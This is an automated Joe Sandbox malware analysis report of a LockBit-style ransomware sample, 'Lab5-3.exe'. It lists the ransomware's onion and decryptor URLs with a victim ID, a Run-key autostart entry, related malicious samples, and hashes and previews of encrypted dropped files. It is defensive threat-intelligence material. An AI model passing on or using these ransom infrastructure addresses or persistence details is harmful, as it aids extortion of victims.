                                                            https://www.google.com/chrome/privacy/eula_text.htmlManagedLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50Lab5-3.exe, 0000001B.00000002.3768778326.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000002.3215191351.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.drtrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://www.google.com/intl/no/chrome/browser/Lab5-3.exe, 0000001B.00000003.2741307384.0000000007AB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstore?hl=enShortcutLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/intl/nl/chrome/browser/Lab5-3.exe, 0000001B.00000003.2741937870.0000000007B31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://api.jqueryui.com/droppable/Lab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelistLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://lockbit-decryptor.top/?Lab5-3.exetrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://chromeenterprise.google/policies/#BrowserSwitcherUrlListLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://policies.google.com/Lab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/intl/en/chrome/browser/Lab5-3.exe, 0000001B.00000003.2736606134.0000000007CB1000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 0000001B.00000003.2738995885.0000000007DB1000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 0000001B.00000003.2736606134.0000000007BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://lockbitks2tvnmwk.onion/?Lab5-3.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://bridges.torproject.orgLab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drfalse
                                                                            high
                                                                            https://assets.activity.windows.comLab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50Lab5-3.exe, 0000001B.00000002.3768778326.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, Lab5-3.exe, 00000028.00000002.3215191351.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.drtrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://www.zurb.com/playground/jquery-text-change-custom-eventLab5-3.exe, 0000001B.00000003.2763814011.00000000208F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://tb-manual.torproject.org/aboutLab5-3.exe, Restore-My-Files.txt72.0.dr, Restore-My-Files.txt68.27.dr, Restore-My-Files.txt111.27.dr, Restore-My-Files.txt140.27.dr, Restore-My-Files.txt30.40.dr, Restore-My-Files.txt96.0.dr, Restore-My-Files.txt15.40.dr, Restore-My-Files.txt95.40.dr, Restore-My-Files.txt5.0.dr, Restore-My-Files.txt106.40.dr, Restore-My-Files.txt4.27.dr, Restore-My-Files.txt133.27.dr, Restore-My-Files.txt110.40.dr, Restore-My-Files.txt60.27.dr, Restore-My-Files.txt150.27.dr, Restore-My-Files.txt61.0.dr, Restore-My-Files.txt120.27.dr, Restore-My-Files.txt116.0.dr, Restore-My-Files.txt97.40.dr, Restore-My-Files.txt56.27.drfalse
                                                                                  high
                                                                                  https://activity.windows.comLab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://assets.activity.windows.com/v1/assets/$batchLab5-3.exe, 00000000.00000003.1918395906.000000001B455000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylistLab5-3.exe, 0000001B.00000003.1959689588.00000000194D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      239.255.255.250
                                                                                      unknownReserved
                                                                                      unknownunknownfalse
                                                                                      IP
                                                                                      192.168.2.148
                                                                                      192.168.2.149
                                                                                      192.168.2.146
                                                                                      192.168.2.147
                                                                                      192.168.2.140
                                                                                      192.168.2.141
                                                                                      192.168.2.144
                                                                                      192.168.2.145
                                                                                      192.168.2.142
                                                                                      192.168.2.143
                                                                                      192.168.2.159
                                                                                      192.168.2.157
                                                                                      192.168.2.158
                                                                                      192.168.2.151
                                                                                      192.168.2.152
                                                                                      192.168.2.150
                                                                                      192.168.2.155
                                                                                      192.168.2.156
                                                                                      192.168.2.153
                                                                                      192.168.2.154
                                                                                      192.168.2.247
                                                                                      192.168.2.126
                                                                                      192.168.2.248
                                                                                      192.168.2.127
                                                                                      192.168.2.245
                                                                                      192.168.2.124
                                                                                      192.168.2.246
                                                                                      192.168.2.125
                                                                                      192.168.2.249
                                                                                      192.168.2.128
                                                                                      192.168.2.129
                                                                                      192.168.2.240
                                                                                      192.168.2.243
                                                                                      192.168.2.122
                                                                                      192.168.2.244
                                                                                      192.168.2.123
                                                                                      192.168.2.241
                                                                                      192.168.2.120
                                                                                      192.168.2.242
                                                                                      192.168.2.121
                                                                                      192.168.2.137
                                                                                      192.168.2.97
                                                                                      192.168.2.138
                                                                                      192.168.2.96
                                                                                      192.168.2.135
                                                                                      192.168.2.99
                                                                                      192.168.2.136
                                                                                      192.168.2.98
                                                                                      192.168.2.139
                                                                                      192.168.2.250
                                                                                      192.168.2.251
                                                                                      192.168.2.130
                                                                                      192.168.2.91
                                                                                      192.168.2.90
                                                                                      192.168.2.254
                                                                                      192.168.2.133
                                                                                      192.168.2.93
                                                                                      192.168.2.134
                                                                                      192.168.2.92
                                                                                      192.168.2.252
                                                                                      192.168.2.95
                                                                                      192.168.2.131
                                                                                      192.168.2.253
                                                                                      192.168.2.132
                                                                                      192.168.2.94
                                                                                      192.168.2.225
                                                                                      192.168.2.104
                                                                                      192.168.2.226
                                                                                      192.168.2.105
                                                                                      192.168.2.223
                                                                                      192.168.2.102
                                                                                      192.168.2.224
                                                                                      192.168.2.103
                                                                                      192.168.2.229
                                                                                      192.168.2.108
                                                                                      192.168.2.109
                                                                                      192.168.2.227
                                                                                      192.168.2.106
                                                                                      192.168.2.228
                                                                                      192.168.2.107
                                                                                      192.168.2.221
                                                                                      192.168.2.100
                                                                                      192.168.2.222
                                                                                      192.168.2.101
                                                                                      192.168.2.220
                                                                                      192.168.2.236
                                                                                      192.168.2.115
                                                                                      192.168.2.237
                                                                                      192.168.2.116
                                                                                      192.168.2.234
                                                                                      192.168.2.113
                                                                                      192.168.2.235
                                                                                      192.168.2.114
                                                                                      192.168.2.119
                                                                                      192.168.2.238
                                                                                      192.168.2.117
                                                                                      192.168.2.239
                                                                                      192.168.2.118
                                                                                      192.168.2.232
                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                      Analysis ID:1432380
                                                                                      Start date and time:2024-04-26 23:37:46 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 12m 24s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:109
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Lab5-3.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.rans.spre.expl.evad.winEXE@170/2848@4/100
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 50%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 91%
                                                                                      • Number of executed functions: 42
                                                                                      • Number of non-executed functions: 91
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.64.227, 142.250.217.238, 74.125.26.84, 34.104.35.123, 208.111.136.128, 192.229.211.108, 142.250.217.227, 142.250.64.206
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, 1.2.168.192.in-addr.arpa, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                      • Execution Graph export aborted for target Lab5-3.exe, PID 10188 because there are no executed function
                                                                                      • Execution Graph export aborted for target Lab5-3.exe, PID 11204 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadFile calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Report size getting too big, too many NtWriteFile calls found.
                                                                                      • VT rate limit hit for: Lab5-3.exe
                                                                                      TimeTypeDescription
                                                                                      22:38:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XO1XADpO01 "C:\Users\user\Desktop\Lab5-3.exe"
                                                                                      22:38:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XO1XADpO01 "C:\Users\user\Desktop\Lab5-3.exe"
                                                                                      23:38:34API Interceptor3915344x Sleep call for process: Lab5-3.exe modified
                                                                                      23:38:43API Interceptor3x Sleep call for process: WMIC.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      239.255.255.250http://www.superiorbillingsolutions.comGet hashmaliciousUnknownBrowse
                                                                                        Document_a51_19i793302-14b09981a5569-3684u8.jsGet hashmaliciousLatrodectusBrowse
                                                                                          https://rise.articulate.com/share/zO8B8EFq4bxdit8kVRcUzBOZMbkl1WSz#/lessons/2GyyR-D75sLlZcXDanN5dOaLxSSkgNvoGet hashmaliciousHTMLPhisherBrowse
                                                                                            360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                              2k632W2O.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharingGet hashmaliciousHTMLPhisherBrowse
                                                                                                  http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                    phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      Lab5-1.docxGet hashmaliciousUnknownBrowse
                                                                                                        Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          google.comhttp://www.superiorbillingsolutions.comGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.217.228
                                                                                                          Document_a51_19i793302-14b09981a5569-3684u8.jsGet hashmaliciousLatrodectusBrowse
                                                                                                          • 142.250.217.228
                                                                                                          https://rise.articulate.com/share/zO8B8EFq4bxdit8kVRcUzBOZMbkl1WSz#/lessons/2GyyR-D75sLlZcXDanN5dOaLxSSkgNvoGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 142.250.64.206
                                                                                                          360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                                          • 142.250.217.228
                                                                                                          2k632W2O.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                          • 142.250.189.132
                                                                                                          http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.64.196
                                                                                                          phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 192.178.50.68
                                                                                                          Lab5-1.docxGet hashmaliciousUnknownBrowse
                                                                                                          • 192.178.50.36
                                                                                                          Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          • 142.250.217.193
                                                                                                          No context
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          28a2c9bd18a11de089ef85a160da29e4http://www.superiorbillingsolutions.comGet hashmaliciousUnknownBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          Document_a51_19i793302-14b09981a5569-3684u8.jsGet hashmaliciousLatrodectusBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          https://rise.articulate.com/share/zO8B8EFq4bxdit8kVRcUzBOZMbkl1WSz#/lessons/2GyyR-D75sLlZcXDanN5dOaLxSSkgNvoGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          2k632W2O.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          wxfSIz4PAi.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          https://sites.google.com/authorizewebcenter.com/565hu4?usp=sharingGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          Lab5-1.docxGet hashmaliciousUnknownBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          Purchase Order is approved26042024.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                          • 23.202.106.101
                                                                                                          • 20.114.59.183
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:Windows desktop.ini
                                                                                                          Category:dropped
                                                                                                          Size (bytes):129
                                                                                                          Entropy (8bit):5.323600488446077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                                                                                          MD5:A526B9E7C716B3489D8CC062FBCE4005
                                                                                                          SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                                                                                          SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                                                                                          SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                                                                                          Malicious:false
                                                                                                          Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:Windows desktop.ini
                                                                                                          Category:dropped
                                                                                                          Size (bytes):129
                                                                                                          Entropy (8bit):5.323600488446077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                                                                                                          MD5:A526B9E7C716B3489D8CC062FBCE4005
                                                                                                          SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                                                                                                          SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                                                                                                          SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                                                                                                          Malicious:false
                                                                                                          Preview:[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14352
                                                                                                          Entropy (8bit):7.986454652347567
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:+7Sg8V9wwudr92IO/cyFegUWs0bPq7WeUc/o892cdEYqdsLS2EtHJC1pygtyuxaN:8t1ktcmewRbQp/o8goSDtHJCtX5Y+Ytb
                                                                                                          MD5:306FEF697637AFE92F97CF2C4A1BF20D
                                                                                                          SHA1:8EC6B092F7CCEF544A1A8F5D03A2FDA56A2BFF62
                                                                                                          SHA-256:696557376C437A053B70B8B19B5F73EFD7289AAEF04B9EDFF06B427408BCD32E
                                                                                                          SHA-512:842B27F56CA8FB194684720869257A22D9377512FC5511A423600E5DCC5ACDB6B3E3E2D0E6AEE3B0C11DE7353A9EFB5709DC9C0180167B95449EDA0FCF3058F4
                                                                                                          Malicious:false
                                                                                                          Preview:.A...4[x'6..W.@......!.H..3...7v5..#...7.T.C.?nP..3/.|........e.r*?.....%J..-.%._4o.g....9.-u$9w...}.....3".......a..A...=3bL.....<..0m.0..(..=*....|..;.*.|...>DH4N.7N..0.B<|W.a{...54.G~......j.....P...$Xh.%.n...K.n.Wh.8q..z.......#...tu.5..........F.......c....v1........U+..w...t!!(..2-..*..].L#.,....}...F9..4B......D8..M..#..Q..x"..d....xJ..H...f...:v.X#.v.xn....=....v.>..uJ.PNV95.&.J........cR.g.o..{1.v.{.vT....5R.?.Y.K..7%B..m.hQ...Y...%Z!..&...V..8..$...Z>cW.#....J.57....[...g..*q,.?..-.X?.mh<.U.^../^aT(......o....2A.p..O6.,....R.E.w............8.OZ....wE.A...d.L...x.....|b;bY.b.,JG...U(M.(.`> ..N`.(.d.CR.E..]...T.k/.?.cE.,k...IQ..2$.....Z...Z..._l.6.........D.....#OP.....H<......m~.....Ya..9..2 .......ZQ~.G...2V,.<.=..g.;..@&.'L.`*....... ...XI....r..C...rC.....H.h2].\<...v...86q...9x.....[F....6d.:c...l...}.;X@.v..(......gC@...K..9H....0&.q.. STV.!;....5.DB.....F.m..m....z_..=..3..vi.1.?..BiU.yc....>.z..[....3.W..u...A./..=....$...P...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12800
                                                                                                          Entropy (8bit):7.9882535612497785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:tdwYzQHO+oFyvWJzd1xu2AU/aY+NG0t/7CKtb:BKxvWJB1xufnYJ6zCKZ
                                                                                                          MD5:86239EF7A98986485360B8DB3A20D865
                                                                                                          SHA1:3DD95D2D68D29C764A3C2F23C9E369E1F2B9E82B
                                                                                                          SHA-256:1167382EEBF5C1A3C5EEB7968C58810E7C6D5252E6A91F7AA5A1E66E7DDB931A
                                                                                                          SHA-512:C37DF49266504317C18AC0FB77F612C5FCC8569C782CCB9AACF0680D4DBE4B21A4E63B729C7324E2A7AC6307DC8D5421AE2569B39E57DF0054645351D9F81818
                                                                                                          Malicious:false
                                                                                                          Preview:....Q..&.. ..2.../PJ..X..5..R.gG....!....x.{.9.H#sKC..H..ub7.*'...u...S>....6).C.1}.H&....10b"xi......B........E>2. &./df.....x.-.0..CWs.......H..Msy..~Vz...vs....t..DV>..B.g......t([..*.....k.n.r........s.Mp.P.j.)).,.../.xG?^uk..7.....x;.S.wo.m.....zJ..l..,..1..T?$.-H..).a7...->.p...JPL.~%K.AZs.S..lwc.H.s..O.\.y...J._.........6..h6.E..-7?....(T..-.......;.....*.g..V....$......NuT.S:.h<]Da..A..|3.l...p...[.4B[Z........n5`.......\....?g.Q......-A.g..Y....M..~Q..8..B1...:..|Q..ogZ....uK.G*9..Z.V..x...._|._Zn.o..h\..7E..(u....R.B.I....W...lR..D..&.........q.!.g.z).[.B.0.k.3.R%.!?.......l.)u...,..aS..4. js...G.....=A.3..%...XQ..r....N.}.v.}a..m...o.v..T1....\.k.K....3......h1..eB.."1../..y....I.B...Y?.5}/..F.n......c....\.e.f."....xo.[...]^...>\.U..../..Z...a.y.v....~.s-9.......U..........xb$.....)....a.]..e..CB.d>.|b.r .I/..Eq..l.....k..f.>mj.6)..o.q..q....h. H.........*G.8......CM@.....5..JJ.oU.|s.....3`vY....fT..Ri...:|..&...6..=.b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13424
                                                                                                          Entropy (8bit):7.984839197026007
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:peOx0CUztiljlbVuEaIc91U2M0yLo6AcBqYKNLtb:peAMtilRpuE49G2ILBX4YKNLZ
                                                                                                          MD5:E0635B6C1B9E6C0C8DBA92729F0325E2
                                                                                                          SHA1:151FEAD153D49438220A04B2DD77C7E989613AB0
                                                                                                          SHA-256:F158D0241B1FE41AB7EDD30952E216F21C0A8C397DF41D6A61F27044B3E6AF49
                                                                                                          SHA-512:7FB8AFECB8E5DCE3EC979B3282EB3DE1F47CCB84684DAC92EDAF70C3F1E63C3696F5D28799502AD776C62252F5D66C728BF891BEC43DCAD34751A2A980CB8155
                                                                                                          Malicious:false
                                                                                                          Preview:z.j.Pk...}...@.G..P...C.S.{.X|.....<.|6...........$..b..3......!..R..I..v..h..[.Z..6"..\.G..<.9.Jve.._$.....d....OaB..Y......`...f.*...n:..n....|P..*....]l~`..vNCMjD ..a..]..B.&R......3..~ZKB..D.].'...w..........U5@.>3....O..[|.[.b....KFdv..@..i]J.=..q..`/......`*.S.s..-#.U...W..X....D&1..L.0J.6..8...Q..TwAK....c...,&.x.G.3.....)}-.&..B.b.VAD.cz.x..b..#.Eb...@Q...c9q...H..-....`.THC..[6..xw.FV$-=~..$~{KP.^._..f.....H.1`...!.vY[3;..........>..4..9..zJ.?M....w.E.z..&&.7.+zN...?o..4..kS....8........!..^.D.{H....rE.(|.>.1t...&.LF?F4MK.d#|....]..X.N.(.. +........'..J...n...R<2.(uf...R./.?...QE..(.BZK]08../.$"R.]...c.........^X8...3S#.m}...,B.*;....Wwc.B|...;...G#...Y/W.#.A0.....8..U.G%....P6E..s=.....pM.3d...].f]'~.n{.s5:|.....hS~...V".V...L..\V.#..A..1-.......p...{.3..h....T(..YmO..[w..Hj....%:w..|..j....=..y..I.....MG.W...Q..By....}s.`.8.).....0.8...(v.H.s...y|j0.)..C-.du./yq.2T.....g..,[..O.+....,.5.Q%R.l. .hke..e..o..{.....S.i.............
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14656
                                                                                                          Entropy (8bit):7.98703903422419
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:jdD55JWC1CxmNF6cYf8SHcMf6jNRSgFEVnKyMotb:jX5JfAmNF6cYvHcA6qgFE9ooZ
                                                                                                          MD5:D94E2994F440186AEB3B2B5654055C47
                                                                                                          SHA1:8F1854770A4F70B86C29E7D51B814BEA8C3091E7
                                                                                                          SHA-256:B1A51C048FF9A787CC425686BE3C02AF95470B9783059E502C9818C396DBFDBA
                                                                                                          SHA-512:68718715309043E08CDA4F7B51BFBECB0A69787CCF6CB92E4E92D8D9A154E284125A08278024F663C0F49E6CD7D3C8EE5E9F7CD7D8D5457BE11FB17ECA367FCD
                                                                                                          Malicious:false
                                                                                                          Preview:o...0n..Q_$&.Wt..a....j...Y..N.a."...~.C....Mp=..2&.......'..l{^8....4.EV...G....y.3o.1...D.M.@.....1.L@7.#..D..ja..$e....M*..8.E..-jI..y....u.D.FE.......9..1.....V..N..^.ff....<{,xg|.=qgK.J.8.`.Y..)t......\4.5.AY......\.{s...}Q..4'au.P....g.G..........XB..*.q5...R.P.. [C....P#qA.4$....>.b...>..u...pQ..;rP.v=!.O..4.`$.s...:...X..y.S....L..[........5...?<..N.P ....b3....1B.!.tM..y.zW...@..J..... ....5hJ......;..@...n.....k.'I..'p..{.q...W2......C<K..l..+`....,.....C.....o.2...Q03..K.[..(..X..&&.B\.^......K.5......L..%......9..x.[...`6..........g..f...>.~..$..,-GbG!z..sH...d..^(&;.D.Z6....!R....".n.G\=%.W.E\5.}-.A.v...., 4>....1..fc...../V.....Hy.)y.C...H.4.FA.x4.kQ....~..!.t.....0..;...6..X$..?.6.ZL.SH.u......P:.)..w`W-/...O.9U.......K...<.4=...x..L........v......4y...:.N#=......`.?.Z.......Q.........U...,.K.....2...T..z....-....v...]..Pn...&.7.u..._..k.xJ)...lc.}G.......".gsCP@...V.0%....... l..:.X..`<X.....HY6|.......9.P...'..!...F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16592
                                                                                                          Entropy (8bit):7.989540170281854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:+UrsElTAWpb7aDaI9Bc7krQhi1R0SzQ2gugJKIBLLA5tb:3rsiUMaDn9mkrn4KIBL85Z
                                                                                                          MD5:EA96E9D5DD762F1C77D6C2ACD808E263
                                                                                                          SHA1:2B5A8C6B15109F500537A2714C7B0DB7A4B84492
                                                                                                          SHA-256:FFE6E6AE4C72DD762AE3196F56E330BE2DB92133B5379E91CB3D9C8552C16A47
                                                                                                          SHA-512:61A5BA6CC7D56FD45935A15A6BDC030FA65806E661EC6546745D01D15A0DE3F836355EE09DD9462E7815906F4C88C3FFC45FFB43D592EEF31F06026F74AAE48F
                                                                                                          Malicious:false
